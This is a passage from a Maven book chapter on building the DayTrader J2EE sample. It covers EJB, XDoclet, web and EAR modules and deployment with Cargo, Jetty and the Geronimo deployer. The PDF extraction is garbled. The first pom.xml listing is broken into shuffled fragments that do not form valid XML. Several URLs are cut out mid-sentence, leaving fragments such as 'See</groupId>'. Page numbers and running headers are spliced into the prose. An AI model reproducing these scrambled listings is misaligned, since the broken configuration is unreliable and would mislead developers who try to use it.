Tests that require the container to run are called integration tests and are covered at the end of this chapter. Unit tests are tests that execute in isolation from the container. • Unit tests in src/test/java and classpath resources for the unit tests in src/test/resources.. • Runtime classpath resources in src/main/resources.xml.Building J2EE Applications 4. 95 . Any container-specific deployment descriptor should also be placed in this directory.5. More specifically. the standard ejb-jar.xml deployment descriptor is in src/main/resources/META-INF/ejbjar.
0</version> <scope>compile</scope> </dependency> <dependency> <groupId>org.xml file.4_spec</artifactId> <version>1. 96 .samples.plugins</groupId> <artifactId>maven-ejb-plugin</artifactId> <configuration> <generateClient>true</generateClient> <clientExcludes> <clientExclude>**/ejb/*Bean.3</version> <scope>provided</scope> </dependency> </dependencies> <build> <plugins> <plugin> <groupId>org.specs</groupId> <artifactId>geronimo-j2ee_1.0</modelVersion> <parent> <groupId>org.class</clientExclude> </clientExcludes> </configuration> </plugin> </plugins> </build> </project> As you can see. take a look at the content of this project’s pom.0</version> </parent> <artifactId>daytrader-ejb</artifactId> <name>Apache Geronimo DayTrader EJB Module</name> <packaging>ejb</packaging> <description>DayTrader EJBs</description> <dependencies> <dependency> <groupId>org.maven. you're extending a parent POM using the parent element.0. This is because the DayTrader build is a multi-module build and you are gathering common POM elements in a parent daytrader/pom.apache. If you look through all the dependencies you should see that we are ready to continue with building and installing this portion of the build.apache.Better Builds with Maven Now.0</version> <scope>provided</scope> </dependency> <dependency> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> <version>1.apache.daytrader</groupId> <artifactId>daytrader-wsappclient</artifactId> <version>1.0.daytrader</groupId> <artifactId>daytrader</artifactId> <version>1.apache.geronimo.samples.geronimo.xml file: <project> <modelVersion>4.geronimo.
**/*Session. • Lastly. 97 .class. so you must explicitly tell it to do so: <plugin> <groupId>org. Fortunately.plugins</groupId> <artifactId>maven-ejb-plugin</artifactId> <configuration> <generateClient>true</generateClient> <clientExcludes> <clientExclude>**/ejb/*Bean.xml file is is a standard POM file except for three items: • You need to tell Maven that this project is an EJB project so that it generates an EJB JAR when the package phase is called. this prevents the EAR module from including the J2EE JAR when it is packaged. You should note that you're using a provided scope instead of the default compile scope.xml contains a configuration to tell the Maven EJB plugin to generate a Client EJB JAR file when mvn install is called. the Geronimo project has made the J2EE JAR available under an Apache license and this JAR can be found on ibiblio. By default the EJB plugin does not generate the client JAR. The Client will be used in a later examples when building the web module.Building J2EE Applications The ejb/pom. You could instead specify a dependency on Sun’s J2EE JAR. This is achieved by specifying a dependency element on the J2EE JAR.class and **/package. You make this clear to Maven by using the provided scope. This is done by specifying: <packaging>ejb</packaging> • As you’re compiling J2EE code you need to have the J2EE specifications JAR in the project’s build classpath. The reason is that this dependency will already be present in the environment (being the J2EE application server) where your EJB will execute.class</clientExclude> </clientExcludes> </configuration> </plugin> The EJB plugin has a default set of files to exclude from the client EJB JAR: **/*Bean. it still needs to be listed in the POM so that the code can be compiled.maven. this JAR is not redistributable and as such cannot be found on ibiblio.apache.class. Even though this dependency is provided at runtime. However. **/*CMP.html. the pom.
m2\repository\org\apache\geronimo\samples\ daytrader\daytrader-ejb\1. Time elapsed: 0. Relax and type mvn install: C:\dev\m2book\code\j2ee\daytrader\ejb>mvn install [INFO] Scanning for projects.samples.FinancialUtilsTest [surefire] Tests run: 1.. Errors: 0 [INFO] [ejb:ejb] [INFO] Building ejb daytrader-ejb-1. Errors: 0.0.0-client.02 sec Results : [surefire] Tests run: 1.0-client.0\daytrader-ejb-1.jar [INFO] Building ejb client daytrader-ejb-1..jar Maven has created both the EJB JAR and the client EJB JAR and installed them in your local Maven repository. Thus you're specifying a pattern that only excludes from the generated client EJB JAR all EJB implementation classes located in the ejb package (**/ejb/*Bean.daytrader.jar [INFO] Installing C:\dev\m2book\code\j2ee\daytrader\ejb\ target\daytrader-ejb-1.jar to C:\[. Note that it's also possible to specify a list of files to include using clientInclude elements.0. 98 . you need to override the defaults using a clientExclude element because it happens that there are some required non-EJB files matching the default **/*Bean.jar to C:\[.0-client [INFO] Building jar: C:\dev\m2book\code\j2ee\daytrader\ejb\ target\daytrader-ejb-1.0 [INFO] Building jar: C:\dev\m2book\code\j2ee\daytrader\ejb\ target\daytrader-ejb-1.]\.m2\repository\org\apache\geronimo\samples\ daytrader\daytrader-ejb\1. You’re now ready to execute the build.0\daytrader-ejb-1. [INFO] [compiler:compile] Compiling 49 source files to C:\dev\m2book\code\j2ee\daytrader\ejb\target\classes [INFO] [resources:testResources] [INFO] Using default encoding to copy filtered resources.ap [INFO] [install:install] [INFO] Installing C:\dev\m2book\code\j2ee\daytrader\ejb\ target\daytrader-ejb-1.class pattern and which need to be present in the generated client EJB JAR. [INFO] ----------------------------------------------------------[INFO] Building DayTrader :: EJBs [INFO] task-segment: [install] [INFO] ----------------------------------------------------------[INFO] [resources:resources] [INFO] Using default encoding to copy filtered resources.0..]\. Failures: 0. Failures: 0.Better Builds with Maven In this example.0-client.class).geronimo.
Early adopters of EJB3 may be interested to know how Maven supports EJB3.Building J2EE Applications The EJB plugin has several other configuration elements that you can use to suit your exact needs. Stay tuned! 99 . There is a working prototype of an EJB3 Maven plugin. Please refer to the EJB plugin documentation on. however in the future it will be added to the main EJB plugin after the specification is finalized.apache. At the time of writing.org/plugins/maven-ejb-plugin/. the EJB3 specification is still not final.
samples. When writing EJBs it means you simply have to write your EJB implementation class and XDoclet will generate the Home interface.TradeHome" * @ejb.JMSException. Exception […] 100 .samples.geronimo.6. Building an EJB Module With Xdoclet If you’ve been developing a lot of EJBs (version 1 and 2) you have probably used XDoclet to generate all of the EJB interfaces and deployment descriptors for you.daytrader.geronimo.bean * display-name="TradeEJB" * name="TradeEJB" * view-type="remote" * impl-class-name= * "org.ejb. the container-specific deployment descriptors.daytrader.apache.interface * generate="remote" * remote-class= * "org.TradeBean" * @ejb. and the ejb-jar. Note that if you’re an EJB3 user.Trade" * […] */ public class TradeBean implements SessionBean { […] /** * Queue the Order identified by orderID to be processed in a * One Phase commit […] * * @ejb.xml descriptor.ejb. you can run the XDoclet processor to generate those files for you.home * generate="remote" * remote-class= * "org. Using XDoclet is easy: by adding Javadoc annotations to your classes.jms.Better Builds with Maven 4.apache.ejb.geronimo.transaction * type="RequiresNew" *[…] */ public void queueOrderOnePhase(Integer orderID) throws javax. the Remote and Local interfaces.samples.apache.interface-method * view-type="remote" * @ejb. you can safely skip this section – you won’t need it! Here’s an extract of the TradeBean session EJB using Xdoclet: /** * Trade Session EJB manages all Trading services * * @ejb.daytrader.
this has to be run before the compilation phase occurs. This is achieved by using the Maven XDoclet plugin and binding it to the generate-sources life cycle phase.directory}/generated-sources/xdoclet"> <fileset dir="${project.java"></include> <include name="**/*MDB.Building J2EE Applications To demonstrate XDoclet.xml that configures the plugin: <plugin> <groupId>org. Figure 4-7: Directory structure for the DayTrader ejb module when using Xdoclet The other difference is that you only need to keep the *Bean. but you don’t need the ejb-jar.build.build.outputDirectory}/META-INF"/> </ejbdoclet> </tasks> </configuration> </execution> </executions> </plugin> 101 .1" destDir= "${project.java classes and remove all of the Home.sourceDirectory}"> <include name="**/*Bean.build.mojo</groupId> <artifactId>xdoclet-maven-plugin</artifactId> <executions> <execution> <phase>generate-sources</phase> <goals> <goal>xdoclet</goal> </goals> <configuration> <tasks> <ejbdoclet verbose="true" force="true" ejbSpec="2.java"></include> </fileset> <homeinterface/> <remoteinterface/> <localhomeinterface/> <localinterface/> <deploymentdescriptor destDir="${project. As you can see in Figure 4-7. Since XDoclet generates source files. Here’s the portion of the pom. Now you need to tell Maven to run XDoclet on your project. create a copy of the DayTrader ejb module called ejb-xdoclet. Local and Remote interfaces as they’ll also get generated.xml file anymore as it’s going to be generated by Xdoclet.codehaus. the project’s directory structure is the same as in Figure 4-6.
apache. In practice you can use any XDoclet task (or more generally any Ant task) within the tasks element.geronimo. It’s based on a new architecture but the tag syntax is backwardcompatible in most cases.geronimo. in the tasks element you use the ejbdoclet Ant task provided by the XDoclet project (for reference documentation see start INFO: Running <deploymentdescriptor/> Generating EJB deployment descriptor (ejb-jar.sourceforge. […] 10 janv.samples. 2006 16:53:50 xdoclet.directory}/generated-sources/xdoclet (you can configure this using the generatedSourcesDirectory configuration element).samples. […] 10 janv.ejb.ejb.Better Builds with Maven The XDoclet plugin is configured within an execution element.0 […] You might also want to try XDoclet2. However.net/xdoclet/ant/xdoclet/modules/ejb/EjbDocletTask. It also tells Maven that this directory contains sources that will need to be compiled when the compile phase executes. 2006 16:53:51 xdoclet.TradeBean'.xml). but here the need is to use the ejbdoclet task to instrument the EJB class files.apache. nor does it boast all the plugins that XDoclet1 has.AccountBean'.daytrader. […] [INFO] [ejb:ejb] [INFO] Building ejb daytrader-ejb-1.TradeBean'.geronimo. […] INFO: Running <remoteinterface/> Generating Remote interface for 'org.apache.ejb. 102 .XDocletMain start INFO: Running <homeinterface/> Generating Home interface for 'org.build.daytrader.daytrader.AccountBean'.samples.. Finally.samples.org/Maven2+Plugin. The plugin generates sources by default in ${project. 2006 16:53:50 xdoclet.codehaus.daytrader. In addition.html). 2006 16:53:51 xdoclet.XDocletMain start INFO: Running <localhomeinterface/> Generating Local Home interface for 'org. This is required by Maven to bind the xdoclet goal to a phase. the XDoclet plugin will also trigger Maven to download the XDoclet libraries from Maven’s remote repository and add them to the execution classpath.apache.XDocletMain start INFO: Running <localinterface/> Generating Local interface for 'org. […] 10 janv. it should be noted that XDoclet2 is a work in progress and is not yet fully mature.geronimo. There’s also a Maven 2 plugin for XDoclet2 at.
To do so you're going to use the Maven plugin for Cargo.2 distribution from the specified URL and install it in ${installDir}.] <plugin> <groupId>org.net/ sourceforge/jboss/jboss-4. stopping.7. Edit the ejb/pom. In this example.. First.codehaus.dl. Cargo is a framework for manipulating containers. configuring them and deploying modules to them.. Deploying EJBs Now that you know how to build an EJB project. Netbeans.x (containerId element) and that you want Cargo to download the JBoss 4.build. you will also learn how to test it automatically. It offers generic APIs (Java.Building J2EE Applications 4.0.sourceforge. In the container element you tell the Cargo plugin that you want to use JBoss 4.. the JBoss container will be used.2.xml file and add the following Cargo plugin configuration: <build> <plugins> [. 103 .] See</groupId> <artifactId>cargo-maven2-plugin</artifactId> <configuration> <container> <containerId>jboss4x</containerId> <zipUrlInstaller> <url> for full details. Later. you can use the log element to specify a file where Cargo logs will go and you can also use the output element to specify a file where the container's output will be dumped. Maven 2. IntelliJ IDEA. The location where Cargo should install JBoss is a user-dependent choice and this is why the ${installDir} property was introduced.. you will learn how to deploy it. Ant. In order to build this project you need to create a Profile where you define the ${installDir} property's value.codehaus.log</output> <log>${project.log</log> [.build. Maven 1.directory}/cargo. Let's discover how you can automatically start a container and deploy your EJBs into it.directory}/jboss4x.) for performing various actions on containers such as starting. etc.0. For example: <container> <containerId>jboss4x</containerId> <output>${project.zip</url> <installDir>${installDir}</installDir> </zipUrlInstaller> </container> </configuration> </plugin> </plugins> </build> If you want to debug Cargo's execution. you will need to have Maven start the container automatically. in the Testing J2EE Applications section of this chapter.
Nor should the content be shared with other Maven projects at large. The Cargo plugin does all the work: it provides a default JBoss configuration (using port 8080 for example). 104 . For example: <home>c:/apps/jboss-4. It's also possible to tell Cargo that you already have JBoss installed locally. [INFO] [talledLocalContainer] JBoss 4.. In this case.0. Of course..xml file defines a profile named vmassol. and the EJB JAR has been deployed. you can define a profile in the POM. the EJB JAR should first be created.. In that case replace the zipURLInstaller element with a home element. [INFO] Searching repository for plugin with prefix: 'cargo'. or in a settings... as the content of the Profile is user-dependent you wouldn't want to define it in the POM.2 starting. it detects that the Maven project is producing an EJB from the packaging element and it automatically deploys it when the container is started.2 started on port [8080] [INFO] Press Ctrl-C to stop the container.xml file.0. in a profiles...2] [INFO] [talledLocalContainer] JBoss 4.xml file.xml file. That's it! JBoss is running. Thus the best place is to create a profiles.Better Builds with Maven As explained in Chapter 3. in a settings. [INFO] ----------------------------------------------------------------------[INFO] Building DayTrader :: EJBs [INFO] task-segment: [cargo:start] [INFO] ----------------------------------------------------------------------[INFO] [cargo:start] [INFO] [talledLocalContainer] Parsed JBoss version = [4. so run mvn package to generate it.0.2</home> That's all you need to have a working build and to deploy the EJB JAR into JBoss. activated by default and in which the ${installDir} property points to c:/apps/cargo-installs.0.
to stop the container call mvn cargo:stop. If the container was already started and you wanted to just deploy the EJB.org/Maven2+plugin. JSPs. Finally.Building J2EE Applications As you have told Cargo to download and install JBoss. let’s focus on building the DayTrader web module. Building a Web Application Project Now. and more. WEB-INF configuration files. Subsequent calls will be fast as Cargo will not download JBoss again. Figure 4-8: Directory structure for the DayTrader web module showing some Web application resources 105 .8. etc. modifying various container parameters. you would run the cargo:deploy goal. 4. Check the documentation at. deploying on a remote machine. Cargo has many other configuration options such as the possibility of using an existing container installation. except that there is an additional src/main/webapp directory for locating Web application resources such as HTML pages. (see Figure 4-8). especially if you are on a slow connection. The layout is the same as for a JAR module (see the first two chapters of this book). the first time you execute cargo:start it will take some time.
daytrader</groupId> <artifactId>daytrader-ejb</artifactId> <version>1. Depending on the main EJB JAR would also work.0.daytrader</groupId> <artifactId>daytrader</artifactId> <version>1. you specify the required dependencies.4_spec</artifactId> <version>1. 106 .geronimo.apache. The reason you are building this web module after the ejb module is because the web module's servlets call the EJBs.samples. Therefore.samples. for example to prevent coupling.0</version> <scope>provided</scope> </dependency> </dependencies> </project> You start by telling Maven that it’s building a project generating a WAR: <packaging>war</packaging> Next.geronimo.daytrader</groupId> <artifactId>daytrader-ejb</artifactId> <version>1. you need to add a dependency on the ejb module in web/pom. Therefore.specs</groupId> <artifactId>geronimo-j2ee_1.xml: <dependency> <groupId>org.geronimo.apache.samples. It’s always cleaner to depend on the minimum set of required classes.0</modelVersion> <parent> <groupId>org.apache. the servlets only need the EJB client JAR in their classpath to be able to call the EJBs.0</version> <type>ejb-client</type> </dependency> <dependency> <groupId>org.xml file: <project> <modelVersion>4. This is why you told the EJB plugin to generate a client JAR earlier on in ejb/pom.0</version> <type>ejb-client</type> </dependency> Note that you’re specifying a type of ejb-client and not ejb. This is because the servlets are a client of the EJBs.geronimo.0</version> </parent> <artifactId>daytrader-web</artifactId> <name>DayTrader :: Web Application</name> <packaging>war</packaging> <description>DayTrader Web</description> <dependencies> <dependency> <groupId>org.xml.apache.Better Builds with Maven As usual everything is specified in the pom. but it’s not necessary and would increase the size of the WAR file.
mortbay. isn’t it? What happened is that the Jetty6 plugin realized the page was changed and it redeployed the Web application automatically.SelectChannelConnector"> <port>9090</port> <maxIdleTime>60000</maxIdleTime> </connector> </connectors> <userRealms> <userRealm implementation= "org.html. There are various configuration parameters available for the Jetty6 plugin such as the ability to define Connectors and Security realms.HashUserRealm"> <name>Test Realm</name> <config>etc/realm. Now imagine that you have an awfully complex Web application generation process. and so on.mortbay. The Jetty container automatically recompiled the JSP when the page was refreshed.nio.properties. For a reference of all configuration options see the Jetty6 plugin documentation at. possibly generating some files.xml configuration file using the jettyConfig configuration element.mortbay.xml file will be applied first.org/jetty6/mavenplugin/index.jetty. In that case anything in the jetty.jetty</groupId> <artifactId>maven-jetty6-plugin</artifactId> <configuration> […] <connectors> <connector implementation= "org. that you have custom plugins that do all sorts of transformations to Web application resource files. you would use: <plugin> <groupId>org.mortbay. It's also possible to pass in a jetty. Fortunately there’s a solution.security. By default the plugin uses the module’s artifactId from the POM. For example if you wanted to run Jetty on port 9090 with a user realm defined in etc/realm.Better Builds with Maven That’s nifty. 112 . The strategy above would not work as the Jetty6 plugin would not know about the custom actions that need to be executed to generate a valid Web application.jetty.properties</config> </userRealm> </userRealms> </configuration> </plugin> You can also configure the context under which your Web application is deployed by using the contextPath configuration element.
war [INFO] [jetty6:run-exploded] [INFO] Configuring Jetty for project: DayTrader :: Web Application [INFO] Starting Jetty Server .SimpleLogger@78bc3b via org...xml and pom.0.Slf4jLog [INFO] Context path = /daytrader-web 2214 [main] INFO org.. [INFO] Copy webapp resources to C:\dev\m2book\code\j2ee\daytrader\web\target\daytrader-web-1.mortbay. To demonstrate.slf4j.xml file is modified. Then the plugin deploys the WAR file to the Jetty server and it performs hot redeployments whenever the WAR is rebuilt (by calling mvn package from another window. Then it deploys the unpacked Web application located in target/ (whereas the jetty6:run-war goal deploys the WAR file). The Jetty6 plugin also contains two goals that can be used in this situation: • jetty6:run-war: The plugin first runs the package phase which generates the WAR file.Started SelectChannelConnector @ 0.Building J2EE Applications The WAR plugin has an exploded goal which produces an expanded Web application in the target directory..log .. The plugin then watches the following files: WEB-INF/lib.impl.0.xml. 0 [main] INFO org. Calling this goal ensures that the generated Web application is the correct one.Logging to org.log .log.0 [INFO] Assembling webapp daytrader-web in C:\dev\m2book\code\j2ee\daytrader\web\target\daytrader-web-1. WEB-INF/web.. any change to those files results in a hot redeployment. execute mvn jetty6:run-exploded goal on the web module: C:\dev\m2book\code\j2ee\daytrader\web>mvn jetty6:run-exploded [.. WEB-INF/classes.mortbay.0. [INFO] Scan complete at Wed Feb 15 11:59:00 CET 2006 [INFO] Starting scanner at interval of 10 seconds..0. • jetty6:run-exploded: The plugin runs the package phase as with the jetty6:runwar goal.0 [INFO] Generating war C:\dev\m2book\code\j2ee\daytrader\web\target\daytrader-web1.] [INFO] [war:war] [INFO] Exploding webapp. 113 .mortbay.0:8080 [INFO] Scanning .war [INFO] Building war: C:\dev\m2book\code\j2ee\daytrader\web\target\daytrader-web1. for example) or when the pom.
codehaus. First. Restart completed.. so now the focus will be on deploying a packaged WAR to your target container.org/Containers).. Scanning .. edit the web module's pom.port>8280</cargo.. You're now ready for productive web development. Stopping webapp .Better Builds with Maven As you can see the WAR is first assembled in the target directory and the Jetty plugin is now waiting for changes to happen..codehaus.servlet. If you open another shell and run mvn package you'll see the following in the first shell's console: [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] Scan complete at Wed Feb 15 12:02:31 CET 2006 Calling scanner listeners .. Deploying Web Applications You have already seen how to deploy a Web application for in-place Web development in the previous section..10..xml file and add the Cargo configuration: <plugin> <groupId>org.port> </properties> </configuration> </configuration> </plugin> 114 . Reconfiguring webapp . This example uses the Cargo Maven plugin to deploy to any container supported by Cargo (see. This is very useful when you're developing an application and you want to verify it works on several containers.cargo</groupId> <artifactId>cargo-maven2-plugin</artifactId> <configuration> <container> <containerId>${containerId}</containerId> <zipUrlInstaller> <url>${url}</url> <installDir>${installDir}</installDir> </zipUrlInstaller> </container> <configuration> <properties> <cargo. Listeners completed. No more excuses! 4.servlet... Restarting webapp .
There are two differences though: • Two new properties have been introduced (containerId and url) in order to make this build snippet generic. the containerId and url properties should be shared for all users of the build..sourceforge. However.apache.30/bin/ jakarta-tomcat-5.Building J2EE Applications As you can see this is a configuration similar to the one you have used to deploy your EJBs in the Deploying EJBs section of this chapter. Those properties will be defined in a Profile.30.org/dist/jakarta/tomcat-5/v5. add the following profiles to the web/pom.zip</url> </properties> </profile> <profile> <id>tomcat5x</id> <properties> <containerId>tomcat5x</containerId> <url> file. 115 .2.servlet. A cargo. • As seen in the Deploying EJBs section the installDir property is user-dependent and should be defined in a profiles. Thus. You could add as many profiles as there are containers you want to execute your Web application on..0. This is very useful if you have containers already running your machine and you don't want to interfere with them.xml file: [.zip</url> </properties> </profile> </profiles> </project> You have defined two profiles: one for JBoss and one for Tomcat and the JBoss profile is defined as active by default (using the activation element).net/sourceforge/jboss/jboss4.] </build> <profiles> <profile> <id>jboss4x</id> <activation> <activeByDefault>true</activeByDefault> </activation> <properties> <containerId>jboss4x</containerId> <url> element has been introduced to show how to configure the containers to start on port 8280 instead of the default 8080 port.dl.
0.remote..Better Builds with Maven Executing mvn install cargo:start generates the WAR. To deploy the DayTrader’s WAR to a running JBoss server on machine remoteserver and executing on port 80..hostname> <cargo.. you would need the following Cargo plugin configuration in web/pom.] [.2] [INFO] [talledLocalContainer] JBoss 4. once this is verified you'll want a solution to deploy your WAR into an integration platform...0. [INFO] [CopyingLocalDeployer] Deploying [C:\dev\m2book\code\j2ee\daytrader\web\target\daytrader-web-1.codehaus.username> <cargo.0.0.servlet.remote.. However.servlet.hostname>${remoteServer}</cargo..port>${remotePort}</cargo...] [INFO] [cargo:start] [INFO] [talledLocalContainer] Tomcat 5..username>${remoteUsername}</cargo... This is useful for development and to test that your code deploys and works.war] to [C:\[. [INFO] [talledLocalContainer] JBoss 4. One solution is to have your container running on that integration platform and to perform a remote deployment of your WAR to it. [INFO] [talledLocalContainer] Tomcat 5..cargo</groupId> <artifactId>cargo-maven2-plugin</artifactId> <configuration> <container> <containerId>jboss4x</containerId> <type>remote</type> </container> <configuration> <type>runtime</type> <properties> <cargo..password> </properties> </configuration> </configuration> </plugin> 116 ..0.remote.password>${remotePassword}</cargo.30 started on port [8280] [INFO] Press Ctrl-C to stop the container.port> <cargo.remote.2 starting.]\Temp\cargo\50866\webapps]. starts the JBoss container and deploys the WAR into it: C:\dev\m2book\code\j2ee\daytrader\web>mvn install cargo:start [.0.30 starting..2 started on port [8280] [INFO] Press Ctrl-C to stop the container.xml: <plugin> <groupId>org.
It’s time to package the server module artifacts (EJB and WAR) into an EAR for convenient deployment. Check the Cargo reference documentation for all details on deployments at file (see Figure 4-11).apache. • Several configuration properties (especially a user name and password allowed to deploy on the remote JBoss container) to specify all the details required to perform the remote deployment. the changes are: • A remote container and configuration type to tell Cargo that the container is remote and not under Cargo's management. Figure 4-11: Directory structure of the ear module As usual the magic happens in the pom. Start by defining that this is an EAR project by using the packaging element: <project> <modelVersion>4. Note that there was no need to specify a deployment URL as it is computed automatically by Cargo..0. Building an EAR Project You have now built all the individual modules. 4.11.0</version> </parent> <artifactId>daytrader-ear</artifactId> <name>DayTrader :: Enterprise Application</name> <packaging>ear</packaging> <description>DayTrader EAR</description> 117 .daytrader</groupId> <artifactId>daytrader</artifactId> <version>1..org/Deploying+to+a+running+container.codehaus.geronimo.xml file) for those user-dependent.xml file. All the properties introduced need to be declared inside the POM for those shared with other users and in the profiles.0</modelVersion> <parent> <groupId>org.xml file (or the settings. it solely consists of a pom. The ear module’s directory structure can't be any simpler.Building J2EE Applications When compared to the configuration for a local deployment above.
Web modules. jar. 118 .geronimo.samples. define all of the dependencies that need to be included in the generated EAR: <dependencies> <dependency> <groupId>org.0</version> </dependency> </dependencies> Finally. the EAR plugin supports the following module types: ejb. sar and wsr.daytrader</groupId> <artifactId>daytrader-streamer</artifactId> <version>1.0</version> </dependency> <dependency> <groupId>org.samples. and the J2EE version to use.geronimo. par.daytrader</groupId> <artifactId>daytrader-ejb</artifactId> <version>1. the description to use.geronimo. and EJB modules.apache.apache. you need to configure the Maven EAR plugin by giving it the information it needs to automatically generate the application.0</version> <type>ejb</type> </dependency> <dependency> <groupId>org. ejb-client.apache. war.Better Builds with Maven Next. It is also necessary to tell the EAR plugin which of the dependencies are Java modules.samples.daytrader</groupId> <artifactId>daytrader-web</artifactId> <version>1.apache. rar. This includes the display name to use. At the time of writing.samples.xml deployment descriptor file. ejb3.0</version> <type>war</type> </dependency> <dependency> <groupId>org.daytrader</groupId> <artifactId>daytrader-wsappclient</artifactId> <version>1.geronimo.
the contextRoot element is used for the daytrader-web module definition to tell the EAR plugin to use that context root in the generated application.geronimo. 119 .samples.geronimo.xml file.samples.samples.maven.daytrader</groupId> <artifactId>daytrader-web</artifactId> <contextRoot>/daytrader</contextRoot> </webModule> </modules> </configuration> </plugin> </plugins> </build> </project> Here.geronimo.daytrader</groupId> <artifactId>daytrader-wsappclient</artifactId> <includeInApplicationXml>true</includeInApplicationXml> </javaModule> <webModule> <groupId>org.4</version> <modules> <javaModule> <groupId>org. only EJB client JARs are included when specified in the Java modules list.apache. it is often necessary to customize the inclusion of some dependencies such as shown in this example: <build> <plugins> <plugin> <groupId>org. However.apache.apache.plugins</groupId> <artifactId>maven-ear-plugin</artifactId> <configuration> <displayName>Trade</displayName> <description> DayTrader Stock Trading Performance Benchmark Sample </description> <version>1.Building J2EE Applications By default.daytrader</groupId> <artifactId>daytrader-streamer</artifactId> <includeInApplicationXml>true</includeInApplicationXml> </javaModule> <javaModule> <groupId>org.apache. all dependencies are included. or those with a scope of test or provided. You should also notice that you have to specify the includeInApplicationXml element in order to include the streamer and wsappclient libraries into the EAR. with the exception of those that are optional. By default.
Run mvn install in daytrader/streamer..Better Builds with Maven It is also possible to configure where the JARs' Java modules will be located inside the generated EAR.org/plugins/maven-ear-plugin.] <defaultBundleDir>lib</defaultBundleDir> <modules> <javaModule> [: [.daytrader</groupId> <artifactId>daytrader-streamer</artifactId> <includeInApplicationXml>true</includeInApplicationXml> <bundleDir>lib</bundleDir> </javaModule> <javaModule> <groupId>org.. if you wanted to put the libraries inside a lib subdirectory of the EAR you would use the bundleDir element: <javaModule> <groupId>org. 120 . The streamer module's build is not described in this chapter because it's a standard build generating a JAR. For example..samples..samples..apache.] </javaModule> [.geronimo.apache.geronimo.] There are some other configuration elements available in the EAR plugin which you can find out by checking the reference documentation on. However the ear module depends on it and thus you'll need to have the Streamer JAR available in your local repository before you're able to run the ear module's build.apache..
Generating one [INFO] Building jar: C:\dev\m2book\code\j2ee\daytrader\ear\ target\daytrader-ear-1.war] [INFO] Copying artifact [ejb:org.0] to [daytrader-streamer-1.0.jar] [INFO] Copying artifact [jar:org.0] to[daytrader-ejb-1.ear to C:\[..0.MF .0\daytrader-ear-1.xml [INFO] [resources:resources] [INFO] Using default encoding to copy filtered resources.jar] [INFO] Copying artifact [ejb-client:org..samples.0. [INFO] [ear:ear] [INFO] Copying artifact [jar:org.apache.daytrader: daytrader-ejb:1.samples.geronimo.0] to [daytrader-web-1.daytrader: daytrader-streamer:1.ear [INFO] [install:install] [INFO] Installing C:\dev\m2book\code\j2ee\daytrader\ear\ target\daytrader-ear-1.daytrader: daytrader-ejb:1.0] to [daytrader-ejb-1.m2\repository\org\apache\geronimo\samples\ daytrader\daytrader-ear\1.jar] [INFO] Copying artifact [war:org.samples.apache.geronimo.0.samples.jar] [INFO] Could not find manifest file: C:\dev\m2book\code\j2ee\daytrader\ear\src\main\application\ META-INF\MANIFEST.daytrader: daytrader-wsappclient:1.daytrader: daytrader-web:1.0.]\.samples.0. run mvn install: C:\dev\m2book\code\j2ee\daytrader\ear>mvn install […] [INFO] [ear:generate-application-xml] [INFO] Generating application.geronimo.geronimo.0] to [daytrader-wsappclient-1.0-client.apache.geronimo.apache.apache.ear 121 .Building J2EE Applications To generate the EAR.0.
jar</java> </module> <module> <java>daytrader-wsappclient-1. In this example.Better Builds with Maven You should review the generated application. A plan is an XML file containing configuration information such as how to map CMP entity beans to a specific database. Like any other container. it is recommended that you use an external plan file so that the deployment configuration is independent from the archives getting deployed. 4.0" encoding="UTF-8"?> <application xmlns=". The DayTrader application does not deploy correctly when using the JDK 5 or newer.jar</java> </module> <module> <web> <web-uri>daytrader-web-1.com/xml/ns/j2ee" xsi: <description> DayTrader Stock Trading Performance Benchmark Sample </description> <display-name>Trade</display-name> <module> <java>daytrader-streamer-1.sun.war</web-uri> <context-root>/daytrader</context-root> </web> </module> <module> <ejb>daytrader-ejb-1. you'll deploy the DayTrader EAR into Geronimo.xml to prove that it has everything you need: <?xml version="1.com/xml/ns/j2ee" xmlns:xsi=". 122 . Deploying EARs follows the same principle.sun. The next section will demonstrate how to deploy this EAR into a container.0. how to map J2EE resources in the container.com/xml/ns/j2ee/application_1_4.sun.12. Geronimo is somewhat special among J2EE containers in that deploying requires calling the Deployer tool with a deployment plan. Deploying a J2EE Application You have already learned how to deploy EJBs and WARs into a container individually.jar</ejb> </module> </application> This looks good. enabling the Geronimo plan to be modified to suit the deployment environment.xsd" version="1.w3.0. You'll need to use the JDK 1. Geronimo also supports having this deployment descriptor located within the J2EE archives you are deploying. However.4 for this section and the following.0.0. etc.
xml configuration snippet: <plugin> <groupId>org.0.codehaus.xml</plan> </properties> </deployable> </deployables> </deployer> </configuration> </plugin> 123 ..cargo</groupId> <artifactId>cargo-maven2-plugin</artifactId> <configuration> <container> <containerId>geronimo1x</containerId> <zipUrlInstaller> <url> J2EE Applications To get started.xml. You would need the following pom.apache. store the deployment plan in ear/src/main/deployment/geronimo/plan.0/ geronimo-tomcat-j2ee-1.
xml </argument> </arguments> </configuration> </plugin> You may have noticed that you're using a geronimo. As you've seen in the EJB and WAR deployment sections above and in previous chapters it's possible to create properties that are defined either in a properties section of the POM or in a Profile.jar –user system –password manager deploy C:\dev\m2book\code\j2ee\daytrader\ear\target/daytrader-ear-1. in this section you'll learn how to use the Maven Exec plugin. You'll use it to run the Geronimo Deployer tool to deploy your EAR into a running Geronimo container.0-tomcat/bin/deployer.jar</argument> <argument>--user</argument> <argument>system</argument> <argument>--password</argument> <argument>manager</argument> <argument>deploy</argument> <argument> ${project. Modify the ear/pom. or when Cargo doesn't support the container you want to deploy into.build. the Exec plugin will transform the executable and arguments elements above into the following command line: java -jar c:/apps/geronimo-1.13 Testing J2EE Applications).build. put the following profile in a profiles.xml file: <profiles> <profile> <id>vmassol</id> <properties> <geronimo.xml to configure the Exec plugin: <plugin> <groupId>org. Even though it's recommended to use a specific plugin like the Cargo plugin (as described in 4.Better Builds with Maven However.codehaus. As the location where Geronimo is installed varies depending on the user.0.ear </argument> <argument> ${basedir}/src/main/deployment/geronimo/plan.0-tomcat</geronimo. learning how to use the Exec plugin is useful in situations where you want to do something slightly different.home>c:/apps/geronimo-1.directory}/${project.home> </properties> </profile> </profiles> At execution time.home}/bin/deployer.mojo</groupId> <artifactId>exec-maven-plugin</artifactId> <configuration> <executable>java</executable> <arguments> <argument>-jar</argument> <argument>${geronimo.home property that has not been defined anywhere.xml 124 .ear C:\dev\m2book\code\j2ee\daytrader\ear/src/main/deployment/geronimo/plan.xml or settings. This plugin can execute any process.finalName}.
